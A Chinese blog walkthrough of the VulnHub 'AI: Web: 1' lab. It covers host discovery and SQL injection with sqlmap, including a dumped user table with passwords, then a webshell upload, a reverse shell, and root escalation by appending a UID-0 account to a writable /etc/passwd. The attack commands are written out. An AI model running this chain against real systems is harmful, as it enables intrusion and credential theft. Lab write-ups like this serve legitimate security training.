Vulnhub-web1.0

  1. 前言
  2. 解题过程

前言

继续做vulnhub的题,这次是web1.0。
题目地址:AI: Web: 1 ~ VulnHub

Ky1uKf.png

解题过程

kali:192.168.1.110
AI-web:192.168.1.106

探测存活的IP

fping -ag 192.168.1.0/24 > test.txt

KyuHkn.png

打开一康
KyuOpV.png

端口扫描

nmap -sC -sV 192.168.1.106
nmap -p 1-65535 192.168.1.106

KyKPt1.png

发现有个robots.txt,并没有开放ssh

对web进行目录扫描

python3 dirsearch.py -u http://192.168.1.106/ -e path 

KyKtBQ.png

访问robots.txt
KyKwhq.png

两个路径都是403
KyKsjU.png

KyKgHJ.png
robots.txt内容

User-agent: *
Disallow: 
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/

对/m3diNf0/进行目录爆破

python3 dirsearch.py -u http://192.168.1.106/m3diNf0/ -e .php

KyMGP1.png

打开看发现是phpinfo
KyMtxK.png

对/se3reTdir777/进行爆破

python3 dirsearch.py -u http://192.168.1.106/se3reTdir777/ -e php

KyMOLF.png

这两个路径一个是名称一个是ID
KyQFsO.png

尝试插入’,发现报错
KyQEee.png

插入’ #发现返回正常,判断为sql注入
KyQMSP.png

sqlmap跑
KyQJoj.png

数据都跑完之后,得到以下内容

systemuser表里的数据
| 1  | t00r      | RmFrZVVzZXJQYXNzdzByZA==           FakeUserPassw0rd          |
| 2  | aiweb1pwn | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ==  MyEvilPass_f908sdaf9_sadfasf0sa|
| 3  | u3er      | TjB0VGhpczBuZUFsczA=  N0tThis0neAls0

执行is-dba,发现非root
KyQwlV.png

由于知道物理路径(phpinfo),尝试–os-shell

DOCUMENT_ROOT    /home/www/html/web1x443290o2sdf92213

sqlmap给出无写入权限
KyQ4OO.png

尝试upload那个路径,getshell成功

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

Kylihn.png

访问sqlmap的那个可以上传文件的上传webshell

http://192.168.1.106/se3reTdir777/uploads/tmpudktt.php

KylMN9.png

Kyl191.png

利用webshell反弹功能,得到一个伪shell
KylaAH.png

先看了一遍/home目录,发现没啥好用的,然后查了一下/etc/passwd的权限,发现可写
Kylsjf.png

使用perl生成加盐的密码

perl -le 'print crypt("password@123","addedsalt")'

在密码占位符处指定密码,并且UID设置为0,将其添加到 /etc/passwd 文件中

echo "tests:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

由于没看ssh,没法连接上下。而反弹回来的shell不能直接切换用户

python -c "import pty;pty.spawn('/bin/bash')"
export TREM=scrreen

执行上面的命令则可以获得一个”真“shell
Ky1A5d.png

Ky1e2t.png

得到flag
Ky1mxP.png


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Vulnhub-web1.0

本文作者:九世

发布时间:2019-10-27, 20:09:44

最后更新:2019-10-27, 20:52:48

原始链接:http://422926799.github.io/posts/1c5edba3.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录